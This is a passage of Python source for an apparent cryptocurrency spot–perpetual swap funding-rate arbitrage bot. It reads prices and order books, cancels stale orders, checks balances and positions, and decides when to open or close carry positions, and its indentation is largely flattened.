new_spot_ask = float(Operation_info[h]['new_spot_asks_price5'][0])
new_spot_present_price = precfloat((new_spot_ask + new_spot_bid)/2,Necessary_info[h]['spot_tick_digit'])
                            # spot index price
try:
spot_index_tickers = MQ[h]["INDEX_TICKERS_SPOT"].get(timeout=0.5)
spot_index_price = float(spot_index_tickers[0]['idxPx'])
except:
ticker_result = marketAPI.get_index_ticker(instId=h)['data']
time.sleep(0.2)
spot_index_price = float(ticker_result[0]['idxPx'])
                            # swap mark price
try:
swap_mark_prices = MQ[h]["MARK_PRICE_SWAP"].get(timeout=0.5)
swap_mark_price = float(swap_mark_prices[0]['markPx'])
except:
swap_mark_prices = publicAPI.get_mark_price('SWAP')['data']
time.sleep(0.2)
for i in swap_mark_prices:
instr = i["instId"].split("-")
TP = instr[0] + "-" + instr[1]
if TP == h:
swap_mark_price=float(i['markPx'])
                            # swap_size, spot_size
                            if Necessary_info[h]['swap_min_size'] * Necessary_info[h]['contract_val']*swap_present_price > order_limit:  # if the USDT value of the minimum swap order already exceeds order_limit, just use swap_min_size
                                swap_size = Necessary_info[h]['swap_min_size']
                                spot_size = Necessary_info[h]['swap_min_size']*Necessary_info[h]['contract_val']  # contracts are counted in lots, so convert to coin units for spot via contract_val
                                swap_close_size = swap_size * close_short_index
                                spot_close_size = spot_size * close_short_index
                            elif Necessary_info[h]['swap_min_size'] * Necessary_info[h]['contract_val']*swap_present_price < order_limit:  # otherwise derive the sizes from order_limit
                                swap_size = round(order_limit/(swap_present_price * Necessary_info[h]['contract_val']))
                                spot_size = round(order_limit/new_spot_present_price)
                                swap_close_size = swap_size * close_short_index
                                spot_close_size = spot_size * close_short_index
                            # handle leftover swap orders
pending_swap_revoke_mode = 'off'
if Operation_info[h]['swap_pending_list_left'] == 'on':
time.sleep(0.1)
Operation_info[h]['swap_pending_order_result'] = tradeAPI.get_order_list(instId=Necessary_info[h]['swap_instrument_id'])['data']
#print('swap_left_result',Operation_info[h]['swap_pending_order_result'])
                                if len(Operation_info[h]['swap_pending_order_result']) == 0:  # no unfilled orders left
Operation_info[h]['swap_pending_list_left'] = 'off'
else:
                                    if len(Operation_info[h]['swap_pending_order_result']) > 2:  # too many leftover orders, cancel them all
                                        print('duplicate orders')  # TODO: turn this into a DingTalk notification later
                                        tutu = h + '-SWAP: v5 has leftover pending orders that were not cancelled; cancelling them all now'
# sendmessage(tutu)
pending_swap_revoke_mode = 'on'
                                    else:  # a single unfilled order, keep going
                                        # compare against the current top five levels
Operation_info[h]['new_swap_bids_price5'] = []
Operation_info[h]['new_swap_asks_price5'] = []
try:
Operation_info[h]['new_swap_depth5'] = MQ[h]["DEPTH5_SWAP"].get(timeout=1)
new_swap_depth5=Operation_info[h]['new_swap_depth5']
except:
try:
Operation_info[h]['new_swap_depth5'] = Operation_info[h]['new_swap_depth5']
new_swap_depth5=Operation_info[h]['new_swap_depth5']
except:
Operation_info[h]['new_swap_depth5'] = marketAPI.get_orderbook(h + '-SWAP', '5')['data']
new_swap_depth5=Operation_info[h]['new_swap_depth5']
time.sleep(0.1)
for i in range(5):
Operation_info[h]['new_swap_bids_price5'].append(float(new_swap_depth5[0]['bids'][i][0]))
Operation_info[h]['new_swap_asks_price5'].append(float(new_swap_depth5[0]['asks'][i][0]))
                                        # if the top five levels changed, cancel the order
if Operation_info[h]['swap_bids_price5'][:3] != Operation_info[h]['new_swap_bids_price5'][:3] or Operation_info[h]['swap_asks_price5'][:3] != Operation_info[h]['new_swap_asks_price5'][:3]:
pending_swap_revoke_mode = 'on'
                                        # if the top five levels are unchanged
elif Operation_info[h]['swap_bids_price5'][:3] == Operation_info[h]['new_swap_bids_price5'][:3] and Operation_info[h]['swap_asks_price5'][:3] == Operation_info[h]['new_swap_asks_price5'][:3]:
if Operation_info[h]['swap_pending_order_result'][0]['side'] == 'sell':
                                                # check whether our order sits at the best price
if float(Operation_info[h]['swap_pending_order_result'][0]['px']) == float(new_swap_depth5[0]['asks'][0][0]):
                                                    # then check whether it is the only order at that level; if so, cancel
if float(new_swap_depth5[0]['asks'][0][3]) == 1:
pending_swap_revoke_mode = 'on'
                                                # elif float(Operation_info[h]['swap_pending_order_result'][0]['px']) != float(new_swap_depth5[0]['asks'][0][0]):  # not at the best price, but we no longer insist on quoting at best, so no need to cancel (0827)
# pending_swap_revoke_mode = 'on'
elif Operation_info[h]['swap_pending_order_result'][0]['side'] == 'buy':
if float(Operation_info[h]['swap_pending_order_result'][0]['px']) == float(new_swap_depth5[0]['bids'][0][0]):
if float(new_swap_depth5[0]['bids'][0][3]) == 1:
pending_swap_revoke_mode = 'on'
# elif float(Operation_info[h]['swap_pending_order_result'][0]['px']) != float(new_swap_depth5[0]['bids'][0][0]):
# pending_swap_revoke_mode = 'on'
if pending_swap_revoke_mode == 'on':
order_id_list=[]
if len(Operation_info[h]['swap_pending_order_result']) != 0:
for i in Operation_info[h]['swap_pending_order_result']:
uncomplete_orderId = i['ordId']
uncomplete_order_instId = i['instId']
key_list = []
value_list = []
key_list = ["instId", "ordId"]
value_list = [uncomplete_order_instId, uncomplete_orderId]
dictionary_uncomplete_order = dict(zip(key_list, value_list))
order_id_list.append(dictionary_uncomplete_order)
if len(order_id_list) != 0:
swap_revoke_result = tradeAPI.cancel_multiple_orders(order_id_list)
#print('swap_revoke_result_1',swap_revoke_result)
Operation_info[h]['swap_pending_list_left'] = 'off'
                                # keep the stored swap top-five in sync with the new top-five
Operation_info[h]['swap_bids_price5'][:5] = Operation_info[h]['new_swap_bids_price5'][:5]
Operation_info[h]['swap_asks_price5'][:5] = Operation_info[h]['new_swap_asks_price5'][:5]
                            # handle leftover spot orders
pending_spot_revoke_mode = 'off'
if Operation_info[h]['spot_pending_list_left'] == 'on':
time.sleep(0.1)
Operation_info[h]['spot_pending_order_result'] = tradeAPI.get_order_list(instId=Necessary_info[h]['spot_instrument_id'])['data']
# print('spot_left_result',Operation_info[h]['spot_pending_order_result'])
                                if len(Operation_info[h]['spot_pending_order_result']) == 0:  # no unfilled orders left
Operation_info[h]['spot_pending_list_left'] = 'off'
else:
                                    if len(Operation_info[h]['spot_pending_order_result']) > 2:  # too many leftover orders, cancel them all
                                        tutu = h + '-SPOT: v5 has leftover pending orders that were not cancelled; cancelling them all now'
                                        # sendmessage(tutu)
                                        print('spot repeat order')  # TODO: turn this into a DingTalk notification later
pending_spot_revoke_mode ='on'
                                    else:  # a single unfilled order, keep going
                                        # compare against the current top five levels
Operation_info[h]['new_spot_bids_price5'] = []
Operation_info[h]['new_spot_asks_price5'] = []
try:
Operation_info[h]['new_spot_depth5']= MQ[h]["DEPTH5_SPOT"].get(timeout=0.5)
new_spot_depth5=Operation_info[h]['new_spot_depth5']
# print('spot_depth5 still coming from the websocket ___4')
except:
try:
Operation_info[h]['new_spot_depth5']=Operation_info[h]['new_spot_depth5']
new_spot_depth5=Operation_info[h]['new_spot_depth5']
except:
Operation_info[h]['new_spot_depth5'] = marketAPI.get_orderbook(h, '5')['data']
new_spot_depth5=Operation_info[h]['new_spot_depth5']
print('h_23',h)
print('spot_depth5 fell back to the REST API ___4')
time.sleep(0.1)
for i in range(5):
Operation_info[h]['new_spot_bids_price5'].append(float(new_spot_depth5[0]['bids'][i][0]))
Operation_info[h]['new_spot_asks_price5'].append(float(new_spot_depth5[0]['asks'][i][0]))
# If the top-5 price levels changed, cancel the pending orders
if Operation_info[h]['spot_bids_price5'][:3] != Operation_info[h]['new_spot_bids_price5'][:3] or Operation_info[h]['spot_asks_price5'][:3] != Operation_info[h]['new_spot_asks_price5'][:3]:
pending_spot_revoke_mode = 'on'
# If the top-5 price levels are unchanged
elif Operation_info[h]['spot_bids_price5'][:3] == Operation_info[h]['new_spot_bids_price5'][:3] and Operation_info[h]['spot_asks_price5'][:3] == Operation_info[h]['new_spot_asks_price5'][:3]:
if Operation_info[h]['spot_pending_order_result'][0]['side'] == 'sell': # check whether it sits at the best price
if float(Operation_info[h]['spot_pending_order_result'][0]['px']) == float(new_spot_depth5[0]['asks'][0][0]): # then check whether it is the only order there; if so, cancel
if float(new_spot_depth5[0]['asks'][0][3]) == 1:
pending_spot_revoke_mode = 'on'
# Operation_info[h]['spot_pending_list_left'] = 'off'
# elif float(Operation_info[h]['spot_pending_order_result'][0]['px']) != float(new_spot_depth5[0]['asks'][0][0]): # not at the best price, but we no longer insist on always resting at best, so no need to cancel 0827
# pending_spot_revoke_mode = 'on'
elif Operation_info[h]['spot_pending_order_result'][0]['side'] == 'buy':
if float(Operation_info[h]['spot_pending_order_result'][0]['px']) == float(new_spot_depth5[0]['bids'][0][0]):
if float(new_spot_depth5[0]['bids'][0][3]) == 1:
pending_spot_revoke_mode = 'on'
# elif float(Operation_info[h]['spot_pending_order_result'][0]['px']) != float(new_spot_depth5[0]['asks'][0][0]):
# pending_spot_revoke_mode = 'on'
if pending_spot_revoke_mode == 'on': # any other mode is left alone
order_id_list=[]
for i in Operation_info[h]['spot_pending_order_result']:
uncomplete_orderId = i['ordId']
uncomplete_order_instId = i['instId']
key_list = []
value_list = []
key_list = ["instId", "ordId"]
value_list = [uncomplete_order_instId, uncomplete_orderId]
dictionary_uncomplete_order = dict(zip(key_list, value_list))
order_id_list.append(dictionary_uncomplete_order)
if len(order_id_list) != 0:
spot_revoke_result = tradeAPI.cancel_multiple_orders(order_id_list)
#print('spot_revoke_result_2',spot_revoke_result)
Operation_info[h]['spot_pending_list_left'] = 'off'
# Sync the old spot top-5 snapshot to the new one
Operation_info[h]['spot_bids_price5'][:5] = Operation_info[h]['new_spot_bids_price5'][:5]
Operation_info[h]['spot_asks_price5'][:5] = Operation_info[h]['new_spot_asks_price5'][:5]
# If nothing needs to be cancelled, there is no need to place new orders
if Operation_info[h]['swap_pending_list_left'] == 'on' or Operation_info[h]['spot_pending_list_left'] == 'on': # check whether any resting orders remain
no_pending_order='off' # disable the big-rally and position-gap adjustments
So_Sc_mode='off' # disable the So/Sc basis check as well
# Work out the target amount (TA)
Target_Amount = Necessary_info[h]['Total_money']/new_spot_present_price
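# Target_Amount is the target base-currency quantity: the USDT allocated to this pair divided by the
# current spot price (e.g. Total_money = 1000 USDT at a spot price of 20 USDT gives a target of ~50 coins).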
#print('h',h)
#print('Target_Amount',Target_Amount)
# Fetch spot_balance and swap_position
# spot_balance first
try:
spot_dic = AQ[h]["POSITION_SPOT"].get(timeout=0.5)
Operation_info[h]['spot_balance'] = float(spot_dic['cashBal'])
if Operation_info[h]['spot_balance'] == 0:
Operation_info[h]['spot_balance'] = float(accountAPI.get_account(h.split('-')[0])['data'][0]['details'][0]['cashBal'])
time.sleep(0.5)
except:
total_spot_dic = accountAPI.get_account()['data'][0]['details']
time.sleep(0.5)
spot_cc_list=[]
if len(total_spot_dic)!=0:
for i in total_spot_dic:
TP=i['ccy']+'-USDT'
spot_cc_list.append(TP)
if h in spot_cc_list:
instr_fu = h.split('-')
for i in total_spot_dic:
if i['ccy']==instr_fu[0]:
Operation_info[h]['spot_dic'] = i
spot_dic = Operation_info[h]['spot_dic']
Operation_info[h]['spot_balance'] = float(spot_dic['cashBal'])
else:
Operation_info[h]['spot_balance']=0
else:
Operation_info[h]['spot_balance']=0
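# Spot balance lookup: the account queue is taken first; on timeout, the full REST balance list is
# pulled, matched against the base currency of h, and the balance defaults to 0 if the currency is not held.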
# Fetch the swap position size
try:
swap_dic = AQ[h]["POSITION_SWAP"].get(timeout=0.5)
Operation_info[h]['swap_position'] = float(swap_dic['pos'])
if Operation_info[h]['swap_position'] ==0:
Operation_info[h]['swap_position']= float(accountAPI.get_positions(instId=h+'-SWAP')['data'][0]['pos'])
time.sleep(0.5)
except:
total_swap_dic = accountAPI.get_positions('SWAP')['data']
time.sleep(0.5)
swap_cc_list=[]
if len(total_swap_dic)!=0:
for i in total_swap_dic:
TP=i['instId'].split(i['instId'][-5:])[0]
swap_cc_list.append(TP)
if h in swap_cc_list:
for i in total_swap_dic:
instr_fu = i['instId'].split('-')
if instr_fu[0] + "-" + instr_fu[1] == h:
Operation_info[h]['swap_dic'] = i
swap_dic = Operation_info[h]['swap_dic']
Operation_info[h]['swap_position'] = float(swap_dic['pos'])
else:
Operation_info[h]['swap_position']=0
else:
Operation_info[h]['swap_position']=0
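# Swap position lookup mirrors the spot balance: position queue first, then the REST positions list
# filtered down to this instrument, defaulting to 0 when no position exists.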
#print(Operation_info[h]['spot_balance'] * new_spot_present_price > Necessary_info[h]['Total_money'] * 1.05)
# Big-rally rebalance check: after a sharp rally the position should be closed out as quickly as possible
if no_pending_order == 'on': # skip the rebalance check if any leftover orders exist
if Operation_info[h]['spot_balance'] > 0 : # here spot is long and swap is short
if Operation_info[h]['spot_balance'] * new_spot_present_price > Necessary_info[h]['Total_money'] * 1.2:
So_Sc_mode = 'off'
# mode_open_long_judge = {'Target_Amount': Target_Amount,
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_size': swap_size,
# 'spot_size': spot_size,
# 'contract_value':Necessary_info[h]['contract_val']}
mode_close_long_judge = {'Target_Amount_Close': 0, # Target_Amount_Close is set to 0 here
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h]['Predict_Funding_Rate'],
'present_funding': Necessary_info[h]['Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# open_long_mode, open_long_final_open_mode, open_long_final_close_mode = open_long_judge(mode_open_long_judge)
close_long_mode, close_long_final_open_mode, close_long_final_close_mode = close_long_judge(mode_close_long_judge)
elif Operation_info[h]['spot_balance'] < 0 : # here spot is short and swap is long
if Operation_info[h]['spot_balance'] * new_spot_present_price < Necessary_info[h]['Total_money'] * -1.5:
So_Sc_mode = 'off'
# Check how much more of the spot short can still be opened
# max_avail_size_result = float(accountAPI.get_max_avail_size(h,'cross')['data'][0]['availSell'])
# time.sleep(0.1)
# swap_instrumentId = h + '-SWAP'
# funding_rate_result = publicAPI.get_funding_rate(swap_instrumentId)['data'][0]
# time.sleep(0.2)
# if abs(float(funding_rate_result['fundingRate']) + float(funding_rate_result['nextFundingRate']) )< 0.05 / 100: # daily borrow rate
# if smaller, do not open: the carry cannot cover the daily borrow rate
# Target_Amount=0
# elif max_avail_size_result < spot_size:
# freeze TA at the current spot_balance and do not increase it
# Target_Amount= abs(Operation_info[h]['spot_balance']) # abs() because the judge function multiplies by -1
# else:
# pass # proceed as normal and keep opening the spot short
# mode_open_short_judge = {'Target_Amount': Target_Amount,
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_size': swap_size,
# 'spot_size': spot_size,
# 'contract_value':Necessary_info[h]['contract_val']}
mode_close_short_judge = {'Target_Amount_Close': 0, # Target_Amount_Close is set to 0 here
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h]['Predict_Funding_Rate'],
'present_funding': Necessary_info[h]['Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# open_short_mode, open_short_final_open_mode, open_short_final_close_mode = open_short_judge(mode_open_short_judge)
close_short_mode, close_short_final_open_mode, close_short_final_close_mode = close_short_judge(mode_close_short_judge)
if swap_mark_price > spot_index_price: # positive basis: a long carry can be opened (commission not yet included)
#So=10
#Sc=-10
So = swap_mark_price - spot_index_price # So is positive
Sc = spot_index_price - swap_mark_price # Sc is not needed here
elif spot_index_price > swap_mark_price: # negative basis: a short carry can be opened
#So=-10
#Sc=10
So = swap_mark_price - spot_index_price # So is not needed here
Sc = spot_index_price - swap_mark_price # Sc is positive
elif spot_index_price == swap_mark_price:
So=0
Sc=0
So_Sc_mode ='off'
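# So is the opening spread (swap mark minus spot index) and Sc the closing spread (spot index minus
# swap mark), both in absolute price units; further down they are compared against the funding payment
# expressed in the same units (Present_Funding_Rate * spot_index_price) to decide whether the carry is
# worth opening or unwinding.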
# Position-gap adjustment
# print('h_1',h)
# print('spot_balance_23',Operation_info[h]['spot_balance'] )
# print('swap_position_23',Operation_info[h]['swap_position'] )
# print('contract_val_234',Necessary_info[h]['contract_val'])
# print(abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])*new_spot_present_price > (tolerate_limit*1.3 ))
# print('no_pending_order',no_pending_order)
if no_pending_order == 'on': # skip the gap adjustment if any leftover orders exist
if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])*new_spot_present_price > (tolerate_limit*1.5 ):
So_Sc_mode = 'off'
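# The gap is measured in USDT: |spot_balance + swap_position * contract_val| * price; once it exceeds
# 1.5x tolerate_limit the basis filter (So_Sc_mode) is bypassed and a rebalancing order is forced.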
if swap_mark_price >= spot_index_price:
# if Operation_info[h]['spot_balance'] > 0: # currently running the long carry
# follow the So/Sc decision path
if Necessary_info[h]['Present_Funding_Rate'] >= 0:
mode_open_long_judge = {'Target_Amount': Target_Amount,
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_size': swap_size,
'spot_size': spot_size,
'contract_value':Necessary_info[h]['contract_val']}
# open the long carry
open_long_mode, open_long_final_open_mode, open_long_final_close_mode = open_long_judge(mode_open_long_judge) # 开仓模式
elif Necessary_info[h]['Present_Funding_Rate'] < 0: # funding < 0, but the long-carry side is still preferred here
mode_close_short_judge = {'Target_Amount_Close': 0,
# Target_Amount_Close is set to 0 here
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h][
'swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h][
'Predict_Funding_Rate'],
'present_funding': Necessary_info[h][
'Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# close the short carry
close_short_mode, close_short_final_open_mode, close_short_final_close_mode = close_short_judge(mode_close_short_judge)
elif swap_mark_price < spot_index_price:
if Necessary_info[h]['Present_Funding_Rate'] >= 0:
mode_close_long_judge = {'Target_Amount_Close': 0,
# Target_Amount_Close is set to 0 here
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h][
'swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h]['Predict_Funding_Rate'],
'present_funding': Necessary_info[h]['Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# close the long carry
close_long_mode, close_long_final_open_mode, close_long_final_close_mode = close_long_judge(mode_close_long_judge)
elif Necessary_info[h]['Present_Funding_Rate'] < 0:
max_avail_size_result = float(accountAPI.get_max_avail_size(h, 'cross')['data'][0]['availSell'])
time.sleep(0.1)
if max_avail_size_result < spot_size:
if abs(Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) > abs(Operation_info[h]['spot_balance']):
# The spot short cannot be extended and the swap leg exceeds the spot leg, so freeze TA at the current spot_balance and reduce the swap position
Target_Amount_Close = abs(Operation_info[h]['spot_balance'])
mode_close_short_judge = {'Target_Amount_Close': Target_Amount_Close, # Target_Amount_Close is set to spot_balance here
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h]['Predict_Funding_Rate'],
'present_funding': Necessary_info[h]['Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# close the short carry
close_short_mode, close_short_final_open_mode, close_short_final_close_mode = close_short_judge(mode_close_short_judge)
elif abs(Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) < abs(Operation_info[h]['spot_balance']):
# The spot short cannot be extended and the spot leg exceeds the swap leg, so freeze TA at the current spot_balance and build up the swap position
Target_Amount = abs(Operation_info[h]['spot_balance'])
mode_open_short_judge = {'Target_Amount': Target_Amount,
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_size': swap_size,
'spot_size': spot_size,
'contract_value':Necessary_info[h]['contract_val']}
# open the short carry
open_short_mode, open_short_final_open_mode, open_short_final_close_mode = open_short_judge(mode_open_short_judge)
else: # can still extend the short carry
mode_open_short_judge = {'Target_Amount': Target_Amount,
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_size': swap_size,
'spot_size': spot_size,
'contract_value':Necessary_info[h]['contract_val']}
# open the short carry
open_short_mode, open_short_final_open_mode, open_short_final_close_mode = open_short_judge(mode_open_short_judge)
# elif Operation_info[h]['spot_balance'] < 0: # currently running the short carry
# if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])*new_spot_present_price > (tolerate_limit*1.5):
# max_avail_size_result = float(accountAPI.get_max_avail_size(h, 'cross')['data'][0]['availSell'])
# time.sleep(0.1)
# if max_avail_size_result < spot_size:
# So_Sc_mode = 'off'
# if abs(Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) > abs(Operation_info[h]['spot_balance']):
# the spot short cannot be extended and the swap leg exceeds the spot leg, so freeze TA at the current spot_balance and reduce the swap position
# Target_Amount_Close = abs(Operation_info[h]['spot_balance'])
# mode_close_short_judge = {'Target_Amount_Close': Target_Amount_Close, # Target_Amount_Close is set to spot_balance here
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_close_size': swap_close_size,
# 'spot_close_size': spot_close_size,
# 'predict_funding': Necessary_info[h][
# 'Predict_Funding_Rate'],
# 'present_funding': Necessary_info[h][
# 'Present_Funding_Rate'],
# 'So_Sc_mode': So_Sc_mode,
# 'contract_value':Necessary_info[h]['contract_val']}
# close_short_mode, close_short_final_open_mode, close_short_final_close_mode = close_short_judge(mode_close_short_judge)
# elif abs(Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val']) < abs(Operation_info[h]['spot_balance']):
# the spot short cannot be extended and the spot leg exceeds the swap leg, so freeze TA at the current spot_balance and build up the swap position
# Target_Amount = abs(Operation_info[h]['spot_balance'])
# mode_open_short_judge = {'Target_Amount': Target_Amount,
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_size': swap_size,
# 'spot_size': spot_size,
# 'contract_value':Necessary_info[h]['contract_val']}
# open the short carry
# open_short_mode, open_short_final_open_mode, open_short_final_close_mode = open_short_judge(mode_open_short_judge)
# else: # can still extend the short carry
# So_Sc_mode = 'off'
# mode_open_short_judge = {'Target_Amount': Target_Amount,
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_size': swap_size,
# 'spot_size': spot_size,
# 'contract_value':Necessary_info[h]['contract_val']}
# open the short carry
# open_short_mode, open_short_final_open_mode, open_short_final_close_mode = open_short_judge(mode_open_short_judge)
# elif Operation_info[h]['position_direction']=='close': # currently in the closing direction
# if Operation_info[h]['spot_balance'] > 0: # here spot is long and swap is short
# if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])*new_spot_present_price > (tolerate_limit*1.5):
# print('here_check_tilt')
# triggered when the position gap exceeds tolerate_limit*1.3; skip So_Sc_mode since funds may be insufficient, so choose to close instead
# So_Sc_mode = 'off'
# mode_close_long_judge = {'Target_Amount_Close': 0, # Target_Amount_Close is set to 0 here
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_close_size': swap_close_size,
# 'spot_close_size': spot_close_size,
# 'predict_funding': Necessary_info[h]['Predict_Funding_Rate'],
# 'present_funding': Necessary_info[h]['Present_Funding_Rate'],
# 'So_Sc_mode': So_Sc_mode,
# 'contract_value':Necessary_info[h]['contract_val']}
# open_long_mode, open_long_final_open_mode, open_long_final_close_mode = open_long_judge(mode_open_long_judge)
# close_long_mode, close_long_final_open_mode, close_long_final_close_mode = close_long_judge(mode_close_long_judge)
# elif Operation_info[h]['spot_balance'] < 0: # here spot is short and swap is long
# if abs(Operation_info[h]['spot_balance'] + Operation_info[h]['swap_position'] * Necessary_info[h]['contract_val'])*new_spot_present_price> (tolerate_limit*1.5):
# triggered when the position gap exceeds tolerate_limit*1.3; skip So_Sc_mode since the spot may not be sellable any further, so choose the closing mode
# So_Sc_mode = 'off'
# mode_close_short_judge = {'Target_Amount_Close': 0, # Target_Amount_Close is set to 0 here
# 'spot_balance': Operation_info[h]['spot_balance'],
# 'swap_position': Operation_info[h]['swap_position'],
# 'swap_close_size': swap_close_size,
# 'spot_close_size': spot_close_size,
# 'predict_funding': Necessary_info[h][
# 'Predict_Funding_Rate'],
# 'present_funding': Necessary_info[h][
# 'Present_Funding_Rate'],
# 'So_Sc_mode': So_Sc_mode,
# 'contract_value':Necessary_info[h]['contract_val']}
# close_short_mode, close_short_final_open_mode, close_short_final_close_mode = close_short_judge(mode_close_short_judge)
#print('So_Sc_mode_2',So_Sc_mode)
#print('open_long_mode_2345',open_long_mode)
#print('open_short_mode_2345',open_short_mode)
#print('close_long_mode',close_long_mode)
#print('close_short_mode',close_short_mode)
mode_So_Sc = {'maker_commission_spot': maker_commission_spot,
'taker_commission_spot': taker_commission_spot,
'maker_commission_swap': maker_commission_swap,
'taker_commission_swap': taker_commission_swap,
'swap_present_price': swap_present_price,
'spot_index_price': spot_index_price # switched to the spot index here instead of the mid price ('spot_present_price': new_spot_present_price)
}
#So, Sc = make_So_Sc(mode_So_Sc)
#print('swap_present_price',swap_present_price)
#print('spot_index_price',spot_index_price)
#print('So_Sc_mode_3',So_Sc_mode)
# swap_present_price=35
# spot_index_price=35.6
if swap_mark_price > spot_index_price: # positive basis: a long carry can be opened (commission not yet included)
#So=10
#Sc=-10
So = swap_mark_price - spot_index_price # So is positive
Sc = spot_index_price - swap_mark_price # Sc is not needed here
elif spot_index_price > swap_mark_price: # negative basis: a short carry can be opened
#So=-10
#Sc=10
So = swap_mark_price - spot_index_price # So is not needed here
Sc = spot_index_price - swap_mark_price # Sc is positive
elif spot_index_price == swap_mark_price:
So=0
Sc=0
So_Sc_mode ='off'
#print('h',h)
#print('So',So)
# Also considered: if the proportional spread between best ask and best bid is < 0.001, do not place orders
# if (new_swap_ask - new_swap_bid)/swap_present_price< 2*Necessary_info[h]['spot_tick_size'] or (new_spot_ask-new_spot_bid)<2*Necessary_info[h]['swap_tick_size']:
# if Necessary_info[h]['spot_tick_size'] / new_spot_present_price <0.0001 or Necessary_info[h]['swap_tick_size'] / swap_present_price <0.0001:
# So_Sc_mode = 'off'
# Normal flow starts here
if no_pending_order == 'on':
if So_Sc_mode =='on':
if swap_mark_price > spot_index_price:
if Necessary_info[h]['Present_Funding_Rate'] >= 0:
if So > Necessary_info[h]['Present_Funding_Rate'] * spot_index_price:
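# The basis So is in price units, so it is compared against the per-interval funding payment expressed
# in the same units (Present_Funding_Rate * spot_index_price); only when the basis more than covers the
# funding does the bot consider adding to the long carry.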
swap_instrumentId = h + '-SWAP'
funding_rate_result = publicAPI.get_funding_rate(swap_instrumentId)['data'][0]
time.sleep(0.2)
# If the current funding rate is < 0 and current plus next funding is below -0.1%, do not open the long carry
if float(funding_rate_result['fundingRate']) < 0 and float(funding_rate_result['fundingRate']) + float(funding_rate_result['nextFundingRate']) < 0.001:
pass
else:
mode_open_long_judge = {'Target_Amount': Target_Amount,
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h]['swap_position'],
'swap_size': swap_size,
'spot_size': spot_size,
'contract_value':Necessary_info[h]['contract_val']}
# open the long carry
open_long_mode, open_long_final_open_mode, open_long_final_close_mode = open_long_judge(mode_open_long_judge) # opening mode
elif Necessary_info[h]['Present_Funding_Rate'] < 0:
# make closing twice as hard to trigger
if So/2 > -1* Necessary_info[h]['Present_Funding_Rate'] * spot_index_price:
swap_instrumentId = h + '-SWAP'
funding_rate_result = publicAPI.get_funding_rate(swap_instrumentId)['data'][0]
time.sleep(0.2)
if float(funding_rate_result['fundingRate']) < 0 and float(funding_rate_result['fundingRate']) + float(funding_rate_result['nextFundingRate']) < 0.001:
pass
else:
# the average funding rate must exceed 0.03%
if abs(Necessary_info[h]['Present_Funding_Rate']) > 0.0003:
mode_close_short_judge = {'Target_Amount_Close': 0,
# Target_Amount_Close這裡設等於0
'spot_balance': Operation_info[h]['spot_balance'],
'swap_position': Operation_info[h][
'swap_position'],
'swap_close_size': swap_close_size,
'spot_close_size': spot_close_size,
'predict_funding': Necessary_info[h][
'Predict_Funding_Rate'],
'present_funding': Necessary_info[h][
'Present_Funding_Rate'],
'So_Sc_mode': So_Sc_mode,
'contract_value':Necessary_info[h]['contract_val']}
# close the short carry
close_short_mode, close_short_final_open_mode, close_short_final_close_mode = close_short_judge(mode_close_short_judge)
elif swap_mark_price < spot_index_price:
if Necessary_info[h]['Present_Funding_Rate'] >= 0:
# make closing twice as hard to trigger
if Sc/2 > Necessary_info[h]['Present_Funding_Rate'] * spot_index_price:
swap_instrumentId = h + '-SWAP'
funding_rate_result = publicAPI.get_funding_rate(swap_instrumentId)['data'][0]
time.sleep(0.2)
# print(funding_rate_result['fundingRate'])
# print(float(funding_rate_result['nextFundingRate']))
if float(funding_rate_result['fundingRate']) > 0 and float(funding_rate_result['fundingRate']) + float(funding_rate_result['nextFundingRate']) > 0.001:
pass
else:
# the average funding rate must exceed 0.03%
if abs(Necessary_info[h]['Present_Funding_Rate']) > 0.0003:
